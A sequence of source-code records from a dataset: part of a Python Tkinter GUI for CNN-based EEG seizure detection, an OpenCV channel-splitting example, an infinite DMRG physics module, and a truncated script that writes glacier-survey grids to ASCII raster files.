label2 = Label(self.root5, text='precision:')\n label2.config(font=(\"AvantGarde\", 18, \"bold\"),\n fg=\"#14787A\",\n bg=\"#DFEBE9\")\n canvas4.create_window(100, 300, window=label2)\n label4 = Label(self.root5, text=precision)\n self.precisionValue_Entry = precision\n label4.config(font=(\"AvantGarde\", 14, \"bold\"), bg=\"#DFEBE9\")\n canvas4.create_window(100, 330, window=label4)\n\n self.precision = self.precisionValue_Entry\n self.recall = self.recallValue_Entry\n self.accuracy = self.accurancyValue_Entry\n self.nomeArquivo = self.nomeArquivoEDF\n\n ## Criando botao alterar\n self.Boton_close = Button(self.root5,\n text=\"Close\",\n font=(\"AvantGarde\", 20, \"bold\"),\n command=self.root5.destroy,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_close.place(relx=0.70,\n rely=0.8,\n relwidth=0.20,\n relheight=0.10)\n\n def JanelaClassificacao(self):\n self.root5 = Toplevel()\n self.tela5()\n self.frames_de_telaClassification()\n self.MenusClassification()\n self.Classificacao()\n\n # JANELA DO PREDICITION\n def frames_de_telaPrediction(self):\n self.frame_1 = Frame(self.root9, bd=4, bg='#DFEBE9')\n self.frame_1.place(relx=0.70, rely=0.02, relwidth=0.27, relheight=0.80)\n\n self.Boton_info.place(relx=0.02,\n rely=0.2,\n relwidth=0.98,\n relheight=0.10)\n\n self.Boton_close.place(relx=0.02,\n rely=0.8,\n relwidth=0.98,\n relheight=0.10)\n\n def MenusPrediction(self):\n menubar = Menu(self.root9)\n self.root9.config(menu=menubar)\n filemenu = Menu(menubar)\n filemenu2 = Menu(menubar)\n\n def Quit():\n self.root9.destroy()\n\n menubar.add_cascade(label=\"Options\", menu=filemenu)\n menubar.add_cascade(label=\"Reports\", menu=filemenu2)\n filemenu.add_command(label=\"exit\", command=Quit)\n filemenu2.add_command(label=\"Clean\", command=self.limpa_cliente)\n filemenu2.add_command(label=\"Customer File\",\n command=self.gerarRelatorioCliente)\n\n def tela6(self):\n self.root9.title(\"Prediction\")\n self.root9.config(bg=\"#DFEBE9\")\n self.root9.geometry(\"1024x768\")\n self.root9.resizable(True, True)\n self.root9.maxsize(width=900, height=700)\n self.root9.minsize(width=500, height=400)\n self.root9.transient(self.root2)\n self.root9.focus_force()\n self.root9.grab_set()\n\n def Treinamento2(self):\n canvas3 = Canvas(self.root9,\n width=1000,\n height=500,\n relief='raised',\n bg=\"#DFEBE9\")\n canvas3.pack()\n\n print(\"TREINAMENTO2 START ---------------------\")\n # ------ Load the trained CNN model\n print(self.existed_model_name.get())\n network_name = self.existed_model_name.get()\n model = tf.keras.models.load_model(network_name)\n\n # ---- Load data files\n data = self.nomeArquivoEDF\n event = LeituraArquivos.LoadEvento(self.nomeArquivoTSE)\n # print(event)\n\n # --- read EEG data\n raw = mne.io.read_raw_edf(data, preload=True)\n raw.rename_channels(lambda s: s.strip(\".\"))\n #raw.set_montage(\"standard_1020\")\n #raw.set_eeg_reference(\"average\")\n print(raw) # print raw data\n print(raw.info) # print edf info\n\n # ---- sampling rate\n fs = raw.info['sfreq'] # sampling frequency\n duration = len(\n raw) / fs # recording duration of hole eeg data in seconds\n\n # ---- EEG data\n eeg = raw.get_data()\n\n # ---- Remove 60 Hz noise\n signal_filter = processing.butter_bandstop_filter(eeg, 59, 61, fs, 5)\n signal_filter = signal_filter[0:21, :] #Limit at 21 channels\n\n #------ Signal Bands\n delta_teta = processing.butter_bandpass_filter(signal_filter, 1, 7, fs,\n 5)\n alpha_beta = processing.butter_bandpass_filter(signal_filter, 8, 30,\n fs, 5)\n gamma = processing.butter_bandpass_filter(signal_filter, 31, 100, fs,\n 5)\n # ------ Applied STFT to signal bands\n f, t, Zxx_delta_teta = processing.STFT(delta_teta, fs)\n f, t, Zxx_alpha_beta = processing.STFT(alpha_beta, fs)\n f, t, Zxx_gamma = processing.STFT(gamma, fs)\n\n # ------- Create event vector 0 and 1\n event_vec = processing.EventVector(event, t)\n\n # ------- Cut first 1 minute\n Zxx_delta_teta = Zxx_delta_teta[60:, :, :]\n Zxx_alpha_beta = Zxx_alpha_beta[60:, :, :]\n Zxx_gamma = Zxx_gamma[60:, :, :]\n event_vec = event_vec[60:]\n\n # ------- Create the input network\n Zxx_size = Zxx_delta_teta.shape\n Input_net = np.zeros((Zxx_size[0], Zxx_size[1], Zxx_size[2], 3))\n Input_net[:, :, :, 0] = Zxx_delta_teta\n Input_net[:, :, :, 1] = Zxx_alpha_beta\n Input_net[:, :, :, 2] = Zxx_gamma\n\n # -------- Classify events\n cm, predictions, precision, recall, f_score = network.classify(\n model, Input_net, event_vec)\n #cm_plot_labels = [\"Seizure-free\", \"Seizure\"]\n #network.plot_confusion_matrix(cm,\n # cm_plot_labels,\n # title=\"Confusion Matrix\")\n\n #plt.savefig('Resultado.png')\n\n TP = cm[1][1]\n TN = cm[0][0]\n FN = cm[1][0]\n FP = cm[0][1]\n\n print(\n \"---------------------------- PREDICT IMAGE --------------------\")\n plots.plot_predict(t, event_vec, predictions)\n print(\"---------------------------- IMAGE DONE --------------------\")\n # -------- metrics\n accuracy = (TP + TN) / (TP + FP + TN + FN) * 100\n formatted_accuracy = \"{:.2f}\".format(accuracy)\n accuracy = formatted_accuracy\n\n recall = TP / (TP + FN) * 100 #also know as recall\n specificity = TN / (TN + FP) * 100\n precision = TP / (TP + FP) * 100\n error = (FP + FN) / (TP + FP + TN + FN)\n #F1 = 2 * (precision * recall) / (precision + recall)\n print(\"acc: \", accuracy)\n print(\"recall:\", recall)\n print(\"precision:\", precision)\n print('F1-score:', f_score)\n #\n #print(\"spec:\", specificity)\n print(\"error:\", error)\n\n ## Criando botao alterar\n self.Boton_close = Button(self.root9,\n text=\"Close\",\n font=(\"AvantGarde\", 20, \"bold\"),\n command=self.root9.destroy,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_close.place(relx=0.70,\n rely=0.8,\n relwidth=0.20,\n relheight=0.10)\n\n ## Criando botao alterar\n #self.canvas_bt = Canvas(self.root9, bd=0, bg='blue')\n #self.canvas_bt.place(relx=0.1, rely=0.8, relwidth=0.02, relheight=0.02)\n\n ## Criando botao alterar\n #self.canvas_bt = Canvas(self.root9, bd=0, bg='green')\n #self.canvas_bt.place(relx=0.1,\n # rely=0.86,\n # relwidth=0.02,\n # relheight=0.02)\n\n ## Criando botao alterar\n #self.canvas_bt = Canvas(self.root9, bd=0, bg='red')\n #self.canvas_bt.place(relx=0.1,\n # rely=0.92,\n # relwidth=0.02,\n # relheight=0.02)\n\n #self.Botao = Button(self.root9,\n # text=\"Normal\",\n # font=(\"AvantGarde\", 10, \"bold\"),\n # bg='#DFEBE9',\n # width=\"5\",\n # height=\"1\")\n #self.Botao.place(relx=0.15, rely=0.78, relwidth=0.1, relheight=0.05)\n\n #self.Botao = Button(self.root9,\n # text=\"Predictions\",\n # font=(\"AvantGarde\", 10, \"bold\"),\n # bg='#DFEBE9',\n # width=\"5\",\n # height=\"1\")\n #self.Botao.place(relx=0.15, rely=0.84, relwidth=0.1, relheight=0.05)\n\n #self.Botao = Button(self.root9,\n # text=\"Ictal\",\n # font=(\"AvantGarde\", 10, \"bold\"),\n # bg='#DFEBE9',\n # width=\"5\",\n # height=\"1\")\n #self.Botao.place(relx=0.15, rely=0.91, relwidth=0.1, relheight=0.05)\n\n #labelNew2 = Label(self.root9, text='Normal')\n #labelNew2.config(font=('helvetica',14),bg=\"#DFEBE9\")\n #canvas3.create_window(2, 10, window=labelNew2)\n\n #labelNew3 = Label(self.root9, text='Normal')\n #labelNew3.config(font=('helvetica',14),bg=\"#DFEBE9\")\n #canvas3.create_window(2, 10, window=labelNew3)\n\n Resultado = \"Prediction.png\"\n width = 600\n height = 400\n img = Image.open(Resultado)\n img = img.resize((width, height), Image.ANTIALIAS)\n self.accurancy = ImageTk.PhotoImage(img)\n canvas3.imageList = []\n canvas3.pack()\n canvas3.create_image(200, 230, anchor=\"w\", image=self.accurancy)\n canvas3.imageList.append(self.accurancy)\n\n label2 = Label(self.root9, text='Accurancy:')\n label2.config(font=(\"AvantGarde\", 18, \"bold\"),\n fg=\"#14787A\",\n bg=\"#DFEBE9\")\n canvas3.create_window(100, 100, window=label2)\n label4 = Label(self.root9, text=accuracy)\n self.accurancyValue_Entry = accuracy\n formatted_recall = \"{:.2f}\".format(recall)\n recall = formatted_recall\n formatted_precision = \"{:.2f}\".format(precision)\n precision = formatted_precision\n self.recallValue_Entry = formatted_recall\n self.precisionValue_Entry = formatted_precision * 100\n label4.config(font=(\"AvantGarde\", 14, \"bold\"), bg=\"#DFEBE9\")\n canvas3.create_window(100, 130, window=label4)\n\n label2 = Label(self.root9, text='Recall:')\n label2.config(font=(\"AvantGarde\", 18, \"bold\"),\n fg=\"#14787A\",\n bg=\"#DFEBE9\")\n canvas3.create_window(100, 200, window=label2)\n label4 = Label(self.root9, text=recall)\n self.recallValue_Entry = recall\n label4.config(font=(\"AvantGarde\", 14, \"bold\"), bg=\"#DFEBE9\")\n canvas3.create_window(100, 230, window=label4)\n\n label2 = Label(self.root9, text='Precision:')\n label2.config(font=(\"AvantGarde\", 18, \"bold\"),\n fg=\"#14787A\",\n bg=\"#DFEBE9\")\n canvas3.create_window(100, 300, window=label2)\n label4 = Label(self.root9, text=precision)\n self.precisionValue_Entry = precision\n label4.config(font=(\"AvantGarde\", 14, \"bold\"), bg=\"#DFEBE9\")\n canvas3.create_window(100, 330, window=label4)\n\n def JanelaPrediction(self):\n self.root9 = Toplevel()\n self.tela6()\n self.frames_de_telaPrediction()\n self.MenusPrediction()\n self.Treinamento2()\n\n # JANELA DO TREINAMENTO\n def TreinamentoModelo(self):\n # 1) Pegar nome do File\n # 2) Conferir se ele existe na pasta\n # 3) Se Não existir e se esperava um File, mandar mensagem\n # 4) Se tiver arquvi ler e passar pelo keras\n # 5) Se não tiver e não precisar criar um novo\n # print(self.Tipvar.get())\n # print(self.new_model_name.get())\n\n network_name = self.new_model_name.get()\n type_network = self.Tipvar.get()\n print(\"Entrei\")\n print(network_name)\n print(self.Tipvar.get())\n\n if type_network == \"Old Model\":\n flag = 1\n else:\n flag = 0\n\n if flag == 0:\n #---- CNN model\n model = network.Model()\n print(\"New model\")\n else:\n model = tf.keras.models.load_model(network_name)\n print(\"Trained model\")\n\n Zxx_delta_teta_v = []\n Zxx_alpha_beta_v = []\n Zxx_gamma_v = []\n event_vec_v = []\n\n for i in range(0, 20):\n # ---- Load data files\n #data = load.loadEDF()\n #self.ditArquivoEDF\n diretorioEDF = self.ditArquivoEDF\n diretorioTSE = self.ditArquivoTSE\n\n arquivoEDF = diretorioEDF + \"/train_\" + str(i + 1) + \".edf\"\n arquivoTSE = diretorioTSE + \"/train_\" + str(i + 1) + \".tse\"\n\n data_doc = open(arquivoEDF, 'r')\n data = data_doc.name\n f_tse_doc = open(arquivoTSE, 'r')\n event = load.read_event(f_tse_doc.name)\n # print(event)\n\n # --- read EEG data\n raw = mne.io.read_raw_edf(data, preload=True)\n raw.rename_channels(lambda s: s.strip(\".\"))\n #raw.set_montage(\"standard_1020\")\n #raw.set_eeg_reference(\"average\")\n print(raw) # print raw data\n print(raw.info) # print edf info\n\n # ---- sampling rate\n fs = raw.info['sfreq'] # sampling frequency\n duration = len(\n raw) / fs # recording duration of hole eeg data in seconds\n\n # ---- EEG data\n eeg = raw.get_data()\n\n # ---- Remove 60 Hz noise\n signal_filter = processing.butter_bandstop_filter(\n eeg, 59, 61, fs, 5)\n signal_filter = signal_filter[0:21, :] #Limit at 21 channels\n\n #------ Signal Bands\n delta_teta = processing.butter_bandpass_filter(\n signal_filter, 1, 7, fs, 5)\n alpha_beta = processing.butter_bandpass_filter(\n signal_filter, 8, 30, fs, 5)\n gamma = processing.butter_bandpass_filter(signal_filter, 31, 100,\n fs, 5)\n # ------ Applied STFT to signal bands\n f, t, Zxx_delta_teta = processing.STFT(delta_teta, fs)\n f, t, Zxx_alpha_beta = processing.STFT(alpha_beta, fs)\n f, t, Zxx_gamma = processing.STFT(gamma, fs)\n\n # ------- Create event vector 0 and 1\n event_vec = processing.EventVector(event, t)\n\n # ------- Cut first 1 minute\n Zxx_delta_teta = Zxx_delta_teta[60:, :, :]\n Zxx_alpha_beta = Zxx_alpha_beta[60:, :, :]\n Zxx_gamma = Zxx_gamma[60:, :, :]\n event_vec = event_vec[60:]\n\n Zxx_delta_teta_v.append(Zxx_delta_teta)\n Zxx_alpha_beta_v.append(Zxx_alpha_beta)\n Zxx_gamma_v.append(Zxx_gamma)\n event_vec_v.append(event_vec)\n print(i)\n\n Zxx_delta_teta_total = np.concatenate(\n (Zxx_delta_teta_v[0], Zxx_delta_teta_v[1]), axis=0)\n Zxx_alpha_beta_total = np.concatenate(\n (Zxx_alpha_beta_v[0], Zxx_alpha_beta_v[1]), axis=0)\n Zxx_gamma_total = np.concatenate((Zxx_gamma_v[0], Zxx_gamma_v[1]),\n axis=0)\n event_vec_total = (event_vec_v[0] + event_vec_v[1])\n\n arch_number = len(Zxx_delta_teta_v)\n\n for i in range(2, arch_number):\n Zxx_delta_teta_total = np.concatenate(\n (Zxx_delta_teta_total, Zxx_delta_teta_v[i]), axis=0)\n Zxx_alpha_beta_total = np.concatenate(\n (Zxx_alpha_beta_total, Zxx_alpha_beta_v[i]), axis=0)\n Zxx_gamma_total = np.concatenate((Zxx_gamma_total, Zxx_gamma_v[i]),\n axis=0)\n event_vec_total += event_vec_v[i]\n\n # ------- Create the input network\n Zxx_size = Zxx_delta_teta_total.shape\n Input_net = np.zeros((Zxx_size[0], Zxx_size[1], Zxx_size[2], 3))\n Input_net[:, :, :, 0] = Zxx_delta_teta_total\n Input_net[:, :, :, 1] = Zxx_alpha_beta_total\n Input_net[:, :, :, 2] = Zxx_gamma_total\n\n # -------- Train CNN model\n [acc, val_acc, loss1,\n val_loss1], model = network.train(model, Input_net, event_vec_total)\n #os.makedirs('models/')\n model.save(network_name)\n\n # -------- Learning plots\n #plots.plot_acc_curve(acc, val_acc)\n #plots.plot_loss_curve(loss1, val_loss1)\n\n # -------- Tela\n sinal_delta_theta = Zxx_delta_teta_total\n sinal_alpha_beta = Zxx_alpha_beta_total\n sinal_gama = Zxx_gamma_total\n delta_theta_dividido = ProcessamentoDoSinal.dividir_sinal(\n sinal_delta_theta, fs)\n\n alpha_beta_dividido = ProcessamentoDoSinal.dividir_sinal(\n sinal_alpha_beta, fs)\n gama_dividido = ProcessamentoDoSinal.dividir_sinal(sinal_gama, fs)\n AssociaTrechoEvento.associa_trecho_evento(delta_theta_dividido,\n eventos)\n AssociaTrechoEvento.associa_trecho_evento(alpha_beta_dividido, eventos)\n AssociaTrechoEvento.associa_trecho_evento(gama_dividido, eventos)\n dados = CriaImagen.cria_imagens_saidas(gama_dividido,\n delta_theta_dividido,\n alpha_beta_dividido)\n\n fft_imagens = []\n for i in range(0, len(dados[0])):\n fft = np.fft.fftn(dados[0][i])\n fft = np.log(np.abs(np.fft.fftshift(fft)**2))\n img_fft = tf.keras.preprocessing.image.array_to_img(fft)\n array_fft = tf.keras.preprocessing.image.img_to_array(img_fft)\n array_fft = array_fft * (1.0 / 255)\n fft_imagens.append(array_fft)\n\n fft_imagens = np.array(fft_imagens)\n UsaRede.treina_rede(fft_imagens, dados[1])\n cm = UsaRede.classifica_dados(fft_imagens, dados[1])\n predictions = UsaRede.classifica_sem_saidas(fft_imagens)\n cm_plot_labels = [\"Normal\", \"Epilepsy\"]\n #ConfusionMatrix.plot_confusion_matrix(cm,\n # cm_plot_labels,\n # title=\"Confusion Matrix\")\n TP = cm[1][1]\n TN = cm[0][0]\n FP = cm[1][0]\n FN = cm[0][1]\n accuracy = (TP + TN) / (TP + FP + TN + FN) * 100\n formatted_accuracy = \"{:.2f}\".format(accuracy)\n accuracy = formatted_accuracy\n recall = TP / (TP + FN) * 100 # ADD DATASET\n precision = TP / (TP + FP) * 100\n if TP == 0:\n recall = 0\n else:\n recall = TP / (TP + FN) * 100 # ADD DATASET\n predictions = UsaRede.classifica_sem_saidas(fft_imagens)\n predictions = np.array(predictions)\n self.accurancyValue_Entry = accuracy\n formatted_recall = \"{:.2f}\".format(recall)\n recall = formatted_recall\n formatted_precision = \"{:.2f}\".format(precision)\n precision = formatted_precision\n self.recallValue_Entry = formatted_recall\n self.precisionValue_Entry = formatted_precision * 100\n self.recallValue_Entry = recall\n self.precisionValue_Entry = precision\n\n # Janela Treinamento Carregando\n def tela12(self):\n self.root8.title(\"Training Loading\")\n self.root8.config(bg=\"#DFEBE9\")\n self.root8.geometry(\"1024x768\")\n self.root8.resizable(True, True)\n self.root8.maxsize(width=300, height=300)\n self.root8.minsize(width=300, height=300)\n self.root8.transient(self.root2)\n self.root8.focus_force()\n self.root8.grab_set()\n\n def TelaClassificacaoResults(self):\n canvasroot8 = Canvas(self.root8,\n width=1000,\n height=700,\n relief='raised',\n bg=\"#DFEBE9\")\n canvasroot8.pack()\n\n #Imagens logs=os\n width = 500\n height = 200\n\n # Title\n label2 = Label(\n self.root8,\n text=\"\"\"The training will take a few minutes, please wait \n until the confirmation window appears \"\"\")\n label2.config(font=('helvetica', 9), bg=\"#DFEBE9\")\n canvasroot8.create_window(145, 40, window=label2)\n\n def TreinamentoOcorrendo(self):\n self.root8 = Toplevel()\n self.tela12()\n self.TelaClassificacaoResults()\n\n\nApplication()","repo_name":"natuneuro/Seizure-Detection-Python","sub_path":"Tela.py","file_name":"Tela.py","file_ext":"py","file_size_in_byte":75307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42764548502","text":"# -*- coding:utf-8 -*-\nimport cv2 as cv\nimport sys\nimport numpy as np\n\n\nif __name__ == '__main__':\n # 读取图像并判断是否读取成功\n img = cv.imread('./images/lena.jpg')\n if img is None:\n print('Failed to read lena.jpg.')\n sys.exit()\n\n # 通道分离\n b, g, r = cv.split(img)\n\n # 创建一个和图像尺寸相同的全0矩阵\n zeros = np.zeros(img.shape[:2], dtype='uint8')\n\n # 将通道数目相同的图像矩阵合并\n bg = cv.merge([b, g, zeros])\n gr = cv.merge([zeros, g, r])\n br = cv.merge([b, zeros, r])\n # 将通道数目不相同的图像矩阵合并\n bgr_6 = cv.merge([bg, r, zeros, zeros])\n\n # 展示结果\n cv.imshow('Blue', b)\n cv.imshow('Green', g)\n cv.imshow('Red', r)\n cv.imshow('Blue_Green', bg)\n cv.imshow('Green_Red', gr)\n cv.imshow('Blue_Red', br)\n\n # 关闭窗口\n cv.waitKey(0)\n cv.destroyAllWindows()\n","repo_name":"fengzhenHIT/learnOpenCV4_Python","sub_path":"chapter3/Split_and_merge.py","file_name":"Split_and_merge.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"72"} +{"seq_id":"28418953356","text":"'''\n=============================================\nInfinite density matrix renormalization group\n=============================================\n\niDMRG, including:\n * classes: iDMRG\n * function: iDMRGTSG, iDMRGQP\n'''\n\n__all__=['iDMRG','iDMRGTSG','iDMRGQP']\n\nfrom .DMRG import *\nimport time\nimport warnings\nimport numpy as np\nimport itertools as it\nimport matplotlib.pyplot as plt\nfrom numpy.linalg import norm\nfrom HamiltonianPy import *\nfrom HamiltonianPy.TensorNetwork import *\nfrom .DMRG import *\n\nclass iDMRG(DMRG):\n '''\n Infinite density matrix renormalization group.\n\n Attributes\n ----------\n niter : int\n The number of iterations.\n '''\n CORE=('niter','lattice','block','cache')\n\n def __init__(self,tsg,lattice,terms,config,degfres,mask=(),ttype='D',dtype=np.complex128,target=0,**karg):\n '''\n Constructor.\n\n Parameters\n ----------\n tsg : TSG\n The two-site grow app.\n lattice,terms,config,degfres,mask,ttype,dtype,target :\n See DMRG.__init__ for details.\n '''\n super(iDMRG,self).__init__(lattice,terms,config,degfres,mask,ttype,dtype,target)\n assert isinstance(tsg,TSG)\n self.preload(tsg)\n self.niter=-1\n\n @property\n def TSG(self):\n '''\n Two-site grow app.\n '''\n return self.apps[self.preloads[0]]\n\n @property\n def mpo(self):\n '''\n MPO shifted by the last ground state energy.\n '''\n if self.niter<0:\n mpo=MPO()\n elif self.niter1:\n for i,site in enumerate(it.chain(sites[:nspb],sites[-nspb:])):\n self.cache['shiftedsites'][-nspb*2+i][0].site=site\n sites=sites[nspb:3*nspb]\n self.cache['shiftedsites'].extend(OptStr([Opt.identity(site,self.dtype)*(-self.block.info['Esite'])]) for site in sites)\n mpo=OptMPO(self.cache['optstrs']+self.cache['shiftedsites'],self.degfres).tompo(ttype=self.block.ttype)\n else:\n self.cache['optstrs']=[OptStr.fromoperator(operator,self.degfres) for operator in self.generator.operators]\n sites=self.block.mps.sites\n self.cache['shiftedsites']=[OptStr([Opt.identity(site,self.dtype)*(-self.block.info['Esite'])]) for site in sites]\n mpo=OptMPO(self.cache['optstrs']+self.cache['shiftedsites'],self.degfres).tompo(ttype=self.block.ttype)\n mpo=mpo[len(mpo)//2-len(sites)//2:len(mpo)//2+len(sites)//2]\n lold,rold=self.block.mpo[0].labels[MPO.L],self.block.mpo[-1].labels[MPO.R]\n lnew,rnew=mpo[0].labels[MPO.L],mpo[-1].labels[MPO.R]\n assert lnew.equivalent(lold) and rnew.equivalent(rold)\n return mpo\n\n def update(self,**karg):\n '''\n Update the iDMRG with new parameters.\n '''\n super(iDMRG,self).update(**karg)\n if len(karg)>0 and len(self.generator.operators)>0:\n self.block.reset(mpo=self.mpo,LEND=self.block.lcontracts[0],REND=self.block.rcontracts[-1])\n\n def resetgenerator(self):\n '''\n Reset the generator of the engine.\n '''\n self.config.reset(pids=self.lattice.pids)\n self.degfres.reset(leaves=self.config.table(mask=self.mask,maps={'scope':iDMRG.scopemap}))\n self.generator.reset(bonds=self.lattice.bonds,config=self.config)\n\n @staticmethod\n def scopemap(scope):\n '''\n '''\n if isinstance(scope,str):\n assert scope in {'A','B'}\n return (1,) if scope=='A' else (2,)\n else:\n assert isinstance(scope,tuple) and len(scope)==2\n return (0,scope[1]) if scope[0]=='L' else (2,-scope[1])\n\n def iterate(self,target=None):\n '''\n Iterate the block of the DMRG.\n\n Parameters\n ----------\n target : QuantumNumber, optional\n The target of the block of the DMRG.\n '''\n self.niter+=1\n osvs=self.cache.get('osvs',np.array([1.0]))\n if self.niter>=self.lattice.nneighbour+self.DTRP:\n self.cache['osvs']=self.block.mps.Lambda.data\n self.block.mpo=self.mpo\n sites=self.block.mps.sites\n obonds=[bond.identifier for bond in self.block.mpo.bonds]\n sbonds=[bond.identifier for bond in self.block.mps.bonds]\n qn=target-self.block.target if isinstance(target,QuantumNumber) else 0\n self.block.predict(sites,obonds,sbonds,osvs,qn)\n else:\n A,B=(('L',0),('R',0)) if self.niter==0 else ('A','B')\n ls=[('L',i) for i in range(self.niter)]\n rs=[('R',i) for i in reversed(range(self.niter))]\n self.lattice.insert(A,B,news=ls+rs)\n self.resetgenerator()\n mpo=self.mpo\n sites,bonds=self.degfres.labels('S'),self.degfres.labels('B')\n if self.block.ttype=='S': sites=[site.replace(qns=site.qns.sorted()) for site in sites]\n osvs=self.cache.get('osvs',np.array([1.0]))\n qn=target-self.block.target if isinstance(target,QuantumNumber) else 0\n self.cache['osvs']=self.block.mps.Lambda.data if self.niter>0 else np.array([1.0])\n mps=self.block.mps.impsgrowth(sites,bonds,osvs,qn,ttype=self.block.ttype)\n self.block.reset(mpo=mpo,mps=mps,target=target)\n if self.niter+1==self.lattice.nneighbour+self.DTRP:\n nsite,nspb=self.block.nsite,self.nspb\n self.block=self.block[nsite//2-nspb:nsite//2+nspb]\n\ndef iDMRGTSG(engine,app):\n '''\n This method iterative update the iDMRG (two-site update).\n\n Parameters\n ----------\n engine : iDMRG\n app : TSG\n '''\n niter=app.recover(engine)\n if niter<0:\n engine.log.open()\n nspb=engine.nspb\n def TSGSWEEP(nsweep,ngrowth):\n assert engine.block.cut==engine.block.nsite/2\n path=list(it.chain(['<<']*(nspb-1),['>>']*(nspb*2-2),['<<']*(nspb-1)))\n for sweep in range(nsweep):\n seold=engine.block.info['Esite']\n engine.sweep(info='No.%s-%s'%(ngrowth+1,sweep+1),path=path,nmax=app.nmax,divisor=2*nspb,piechart=app.plot)\n senew=engine.block.info['Esite']\n if norm(seold-senew)/norm(seold+senew)0 or engine.niter>0,divisor=2*nspb,nmax=app.nmax,piechart=app.plot)\n TSGSWEEP(app.npresweep if engine.niter==0 else app.nsweep,i)\n senew=engine.block.info['Esite']\n if i>=app.miniter-1 and seold is not None and norm(seold-senew)/norm(seold+senew)<10*app.tol: break\n else:\n warnings.warn('iDMRGTSG warning: not converged energy after %s iterations.'%app.maxiter)\n if app.plot and app.savefig:\n plt.savefig('%s/%s_%s_%s.png'%(engine.log.dir,engine,engine.block.target,app.name))\n plt.close()\n if app.savedata: engine.dump()\n engine.log.close()\n\ndef iDMRGQP(engine,app):\n '''\n This function calculate the pumped charge during an adiabatic process.\n\n Parameters\n ----------\n engine : iDMRG\n app : QP\n '''\n def pumpedcharge(parameters):\n t1=time.time()\n engine.update(**parameters)\n engine.rundependences(app.name)\n def averagedcharge(mps):\n ps=mps.Lambda.data**2\n qnindex=mps.Lambda.labels[0].qns.type.names.index(app.qnname)\n qns=mps.Lambda.labels[0].qns.expansion()[:,qnindex]\n return ps.dot(qns)/ps.sum()\n result=averagedcharge(engine.block.mps)-getattr(engine.block.target,app.qnname)/2\n t2=time.time()\n engine.log<<':::: %s\\n'%(', '.join('%s=%s'%(key,decimaltostr(value)) for key,value in engine.parameters.items()))\n engine.log<<':::: pumped charge=%.6f, time=%.4es\\n\\n'%(result,t2-t1)\n return result\n result=np.zeros((app.path.rank(0),2))\n for i,parameters in enumerate(app.path('+')):\n result[i,0]=list(parameters.values())[0] if len(parameters)==1 else i\n result[i,1]=pumpedcharge(parameters)\n name='%s_%s'%(engine.tostr(mask=app.path.tags),app.name)\n if app.savedata: np.savetxt('%s/%s.dat'%(engine.dout,name),result)\n if app.plot: app.figure('L',result,'%s/%s'%(engine.dout,name))\n if app.returndata: return result\n","repo_name":"waltergu/HamiltonianPy","sub_path":"DMRG/iDMRG.py","file_name":"iDMRG.py","file_ext":"py","file_size_in_byte":9115,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"72"} +{"seq_id":"1200384906","text":"import numpy as np\n\ndef write_ascii_raster(file,EE,NN,ZZ,nodata_value=-9999):\n\t# Open File, appending extension if needed\n\tif file.split('.')[-1] != 'ascii':\n\t\tfobj = open(file+'.ascii',\"w\")\n\telse:\n\t\tfobj = open(file,\"w\")\n\t# Write Header\n\tfobj.write('ncols %d\\n'%(EE.shape[1]))\n\tfobj.write('nrows %d\\n'%(EE.shape[0]))\n\tfobj.write('xllcorner %.3f\\n'%(np.nanmin(EE)))\n\tfobj.write('yllcorner %.3f\\n'%(np.nanmin(NN)))\n\tfobj.write('cellsize %.3f\\n'%(np.nanmean(EE[:,1:] - EE[:,:-1])))\n\tfobj.write('nodata_value %.3f\\n'%(nodata_value))\n\n\t# Iterate across input griddata\n\tfor i_ in np.arange(EE.shape[0],0,-1)-1:\n\t\tfor j_ in range(EE.shape[1]):\n\t\t\tz_ij = ZZ[i_,j_]\n\t\t\t# Check if nodata (handles NaN & Inf)\n\t\t\tif not np.isfinite(z_ij):\n\t\t\t\tz_ij = nodata_value\n\t\t\t# Write entry ij\n\t\t\tfobj.write('%.3f'%(z_ij))\n\t\t\t# If not done with the line, add a space\n\t\t\tif j_+1 < EE.shape[1]:\n\t\t\t\tfobj.write(' ')\n\t\t\t# If done with the line, but more lines are present, add a return\n\t\t\telif i_ > 0:\n\t\t\t\tfobj.write('\\n')\n# Finish Writing\n\tfobj.close()\n\n\n#### FETCH NPY GRIDS AND WRITE TO ASCII ####\nfrom glob import glob\n\n# ROOT = '/home/nates/ActiveProjects/SGGS/MANUSCRIPT_CONTENT/INTERPOLATION/Grids'\nROOT = '/home/nates/ActiveProjects/SGGS/MANUSCRIPT_CONTENT/INTERPOLATION/Grids'\n\n\n## LOAD COMMON COORDINATES ##\n# Load Easting & Northing Grid\nEE = np.load(ROOT+'/Easting_Grid.npy')\nNN = np.load(ROOT+'/Northing_Grid.npy')\n\n## LOAD HVSR & HYDROPOTENTIAL MODEL DATA ##\n# Load z_BED Grid\nHVu = np.load(ROOT+'/HVSR_Bed_Elevation_Mean_RBF.npy')\n# Load H_I Uncertainty Grid\nHVo = np.load(ROOT+'/HVSR_Ice_Thickness_STD_RBF.npy')\n\n## LOAD SURFACE VELOCITY & VERTICAL STRAIN RATE DATA ##\n# # Surface Velocity Vector Field\n# VSE = np.load(ROOT+'/Surface_Velocity_Easting_Mean_RBF.npy')\n# VSN = np.load(ROOT+'/Surface_Velocity_Northing_Mean_RBF.npy')\n# Vertical Strain Rate Field\nDEZ = np.load(ROOT+'/Surface_Vertical_Strain_Mean_RBF.npy')\n\n## LOAD MASKS ###\n# Load HVSR Used Station Mask \nM_HV = np.load(ROOT+'/HVSR_Station_RBF_MASK.npy')\n# Load Surface Velocity Station Mask\nM_VS = np.load(ROOT+'/Surface_Velocity_RBF_MASK.npy')\n\n\n## Reconstitute HVSR Layers\nHV_Shallow = (HVu + 2*HVo)*M_HV\nHV_Mean = HVu*M_HV\nHV_Deep = (HVu - 2*HVo)*M_HV\n# Write to file\nwrite_ascii_raster(ROOT+'/HVSR_Shallow_RBF_Bed',EE,NN,HV_Shallow)\nwrite_ascii_raster(ROOT+'/HVSR_Mean_RBF_Bed',EE,NN,HV_Mean)\nwrite_ascii_raster(ROOT+'/HVSR_Deep_RBF_Bed',EE,NN,HV_Deep)\n\n## Reconstitute Vertical Strain Rate 